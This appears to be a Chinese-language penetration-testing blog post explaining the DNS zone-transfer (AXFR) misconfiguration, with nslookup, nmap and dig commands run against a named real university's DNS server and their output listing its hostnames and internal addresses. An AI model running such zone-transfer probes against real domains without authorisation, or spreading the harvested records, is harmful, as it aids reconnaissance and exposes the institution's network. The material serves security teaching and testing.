DNS域传送漏洞
in Pentest with 0 comment

DNS域传送漏洞

in Pentest with 0 comment

漏洞原理:

DNS服务器分为:主服务器备份服务器缓存服务器。在主备服务器之间同步数据库,需要使用“DNS域传送”。域传送是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。

若DNS服务器配置不当,可能导致匿名用户获取某个域的所有记录。造成整个网络的拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器。凭借这份网络蓝图,攻击者可以节省很少的扫描时间。

常用的DNS记录一下几类

    A记录       IP地址记录,记录一个域名对应的IP地址
 
  AAAA记录    IPv6 地址记录,记录一个域名对应的IPv6地址
 
  CNAME记录   别名记录,记录一个主机的别名
 
  MX记录    电子邮件交换记录,记录一个邮件域名对应的IP地址,比如my[at]lijiejie.com
             后面的部分lijiejie.com,邮件服务器对应的IP地址
 
  NS记录      域名服务器记录 ,记录该域名由哪台域名服务器解析
 
  PTR记录     反向记录,也即从IP地址到域名的一条记录
 
   TXT记录     记录域名的相关文本信息

DNS域传送漏洞能干什么,造成什么危害?

黑客可以快速的判定出某个特定zone的所有主机,收集域信息,选择攻击目标,找出未使用的IP地址,黑客可以绕过基于网络的访问控制。

使用nslookup命令测试Dns域传送漏洞

没有漏洞时

C:\Users\lenovo>nslookup -type=ns ***.cn 114.114.114.114
服务器:  public1.114dns.com
Address:  114.114.114.114

非权威应答:
**.edu.cn     nameserver = dns.**.cn

C:\Users\lenovo>nslookup
默认服务器:  UnKnown
Address:  fe80::1

> server dns.**.cn
默认服务器:  dns.**.cn
Address:  *.*.32.9

> ls
服务器:  dns.*.cn
Address:  *.*.32.9

名称:    ls.

> ls *.cn
[dns.*.cn]
*** 无法列出域 lut.cn: Query refused
DNS 服务器拒绝将区域 *.cn 传送到你的计算机。如果这不正确,
请检查 IP 地址 *。*。32.9 的 DNS 服务器上 *.cn 的
区域传送安全设置。

存在漏洞时

C:\Users\lenovo>nslookup
默认服务器:  UnKnown
Address:  fe80::1

> server dns.nwpu.edu.cn
默认服务器:  dns.nwpu.edu.cn
Address:  202.117.80.2

> ls nwpu.edu.cn
[dns.nwpu.edu.cn]
 nwpu.edu.cn.                   NS     server = dns.nwpu.edu.cn
 nwpu.edu.cn.                   NS     server = dns1.nwpu.edu.cn
 nwpu.edu.cn.                   NS     server = dns2.nwpu.edu.cn
 nwpu.edu.cn.                   NS     server = dns3.nwpu.edu.cn
 aaa                            A      202.117.80.60
 admission                      A      222.24.192.15
 aedd                           A      222.24.192.200
 amec                           NS     server = netserver.amec.nwpu.edu.cn      A      202.117.242.194
 tutor                          A      222.24.192.219
 uis                            A      222.24.192.182
 us                             A      222.24.192.103
 view                           A      222.24.192.52
 
.
.           //省略
.
 yuyue                          A      222.24.211.120
 yxtest                         A      222.24.211.31
 yy1                            A      10.152.2.141
 zbwx                           A      222.24.192.172
 zczxwd                         A      222.24.192.206
 zhaopin                        A      222.24.192.147
 zichan                         A      222.24.192.85
 zizhu                          A      202.117.80.133
 zygx                           A      202.117.80.9
>

总结:

使用nmap扫描dns域传送漏洞

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=nwpu.edu.cn -p 53 -Pn dns.nwpu.edu.cn

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-06 23:09 CST
Nmap scan report for dns.nwpu.edu.cn (202.117.80.2)
Host is up (0.078s latency).

PORT   STATE SERVICE
53/tcp open  domain
| dns-zone-transfer:
| nwpu.edu.cn.                   SOA    dns1.nwpu.edu.cn. hxn.nwpu.edu.cn.
| nwpu.edu.cn.                   NS     dns.nwpu.edu.cn.
| nwpu.edu.cn.                   NS     dns1.nwpu.edu.cn.
| nwpu.edu.cn.                   NS     dns2.nwpu.edu.cn.
| nwpu.edu.cn.                   NS     dns3.nwpu.edu.cn.
| nwpu.edu.cn.                   MX     5 mx-nwpu-edu-cn.icoremail.net.
| nwpu.edu.cn.                   MX     15 nwpu03.nwpu.edu.cn.
| nwpu.edu.cn.                   TXT    "v=s

使用dig命令挖掘dns域传送漏洞

dig @dns.nwpu.edu.cn axfr nwpu.edu.cn

; <<>> DiG 9.8.1-P1 <<>> @dns.nwpu.edu.cn axfr nwpu.edu.cn
; (1 server found)
;; global options: +cmd
nwpu.edu.cn.            86400   IN      SOA     dns1.nwpu.edu.cn. hxn.nwpu.edu.cn. 2014041801 21600 3600 604800 10800
nwpu.edu.cn.            86400   IN      NS      dns.nwpu.edu.cn.
nwpu.edu.cn.            86400   IN      NS      dns1.nwpu.edu.cn.
nwpu.edu.cn.            86400   IN      NS      dns2.nwpu.edu.cn.
nwpu.edu.cn.            86400   IN      NS      dns3.nwpu.edu.cn.
nwpu.edu.cn.            600     IN      MX      5 nwpu03.nwpu.edu.cn.
nwpu.edu.cn.            600     IN      MX      15 nwpu03.nwpu.edu.cn.
*.nwpu.edu.cn.          86400   IN      A       222.24.192.99
aisheng.nwpu.edu.cn.    86400   IN      CNAME   www.nwpu.edu.cn.
amec.nwpu.edu.cn.       86400   IN      NS      netserver.amec.nwpu.edu.cn.
(省略大量的记录...)
nwpu.edu.cn.            86400   IN      SOA     dns1.nwpu.edu.cn. hxn.nwpu.edu.cn. 2014041801 21600 3600 604800 10800
;; Query time: 110 msec
;; SERVER: 202.117.80.2#53(202.117.80.2)
;; WHEN: Sun Apr 20 15:11:32 2014
;; XFR size: 188 records (messages 1, bytes 4021)

dig.jpg

Responses